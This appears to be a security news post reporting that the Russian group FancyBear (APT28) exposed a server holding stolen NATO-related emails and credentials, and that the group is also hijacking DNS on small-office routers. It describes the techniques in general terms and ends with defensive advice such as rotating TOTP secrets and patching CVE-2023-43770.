🎯FancyBear, a Russian hacking group, accidentally exposed a lot of secret information about their spying on NATO countries. At the same time, they are still attacking routers to trick people into giving away their passwords. Everyone needs to be extra careful with their online security right now!
The Threat
On March 11, 2026, threat intelligence firm Hunt.io revealed a significant operational security failure by the Russian hacking group FancyBear. This group, also known as APT28, has been linked to espionage campaigns targeting government and military organizations across Europe. The exposure of an open directory on a NameCheap Virtual Private Server allowed researchers to uncover a wealth of sensitive data related to an operation dubbed Operation Roundish. This incident not only highlights the vulnerabilities in cybersecurity practices but also underscores the persistent threat posed by state-sponsored actors.
The compromised server, located in the United States, had been publicly attributed to FancyBear for over 500 days. During this time, the group continued its operations without switching infrastructure, leading to a treasure trove of stolen data being exposed. Researchers found 2,800 exfiltrated emails, 240 sets of stolen credentials, and 11,500 contact addresses from various military and government entities across multiple countries, including NATO member states.
In addition to this server exposure, the UK's NCSC has issued a warning about FancyBear's ongoing attacks targeting routers, particularly small and home office (SOHO) devices. The group is exploiting vulnerabilities to alter DNS settings, redirecting victims to malicious websites that mimic legitimate services, such as Outlook. This tactic has reportedly compromised over 200 organizations and 5,000 devices, indicating a broader and ongoing campaign to gather intelligence and steal credentials.
Who's Behind It
FancyBear is assessed by the UK's NCSC as part of Russia's GRU Military Intelligence Unit 26165. The group has a history of targeting organizations linked to military and government operations, particularly those involved in the ongoing conflict in Ukraine. The geopolitical targeting pattern is deliberate, with the largest victim group being Ukraine's regional prosecutors, likely connected to war crimes investigations. Other affected organizations include Romania's Air Force and Greece's National Defence General Staff. The exposure of sensitive data, including email addresses tied to NATO's infrastructure, raises alarms about the potential for further espionage activities. The implications of this breach extend beyond immediate data theft, as it could inform future attacks and intelligence operations by FancyBear and similar groups.
Tactics & Techniques
One of the most alarming discoveries from this incident was FancyBear's method for bypassing two-factor authentication (2FA). The group employed a JavaScript module called keyTwoAuth.js, which operated within the victim's authenticated webmail session. This clever tactic allowed them to silently extract TOTP secrets and recovery codes without the victims ever realizing their accounts were compromised.
Additionally, the NCSC has reported that FancyBear is using DNS hijacking techniques to redirect users to fake login pages, which can lead to credential theft. The group typically targets widely used routers, including TP-Link and Cisco devices, to facilitate these attacks. This ongoing activity demonstrates how exploited vulnerabilities in network devices can be leveraged by sophisticated hostile actors.
Defensive Measures
Organizations that utilize Roundcube with the twofactorgauthenticator plugin must take immediate action. It is crucial to treat all existing TOTP secrets as potentially compromised and rotate them without delay. Additionally, administrators should audit email-filtering rules for unauthorized entries and block connections to the compromised IP address and domain.
Furthermore, the NCSC emphasizes the importance of securing routers against DNS hijacking. Organizations should ensure that their network devices are updated and configured securely to prevent unauthorized changes to DNS settings. Applying the patch for CVE-2023-43770 and monitoring webmail infrastructure for signs of XSS injection are essential defensive steps. This incident serves as a stark reminder of the importance of robust security practices and the need for continuous vigilance against sophisticated cyber threats.
The dual threat posed by FancyBear's exposed server and ongoing router attacks underscores the need for organizations to implement layered security strategies and remain vigilant against evolving tactics.
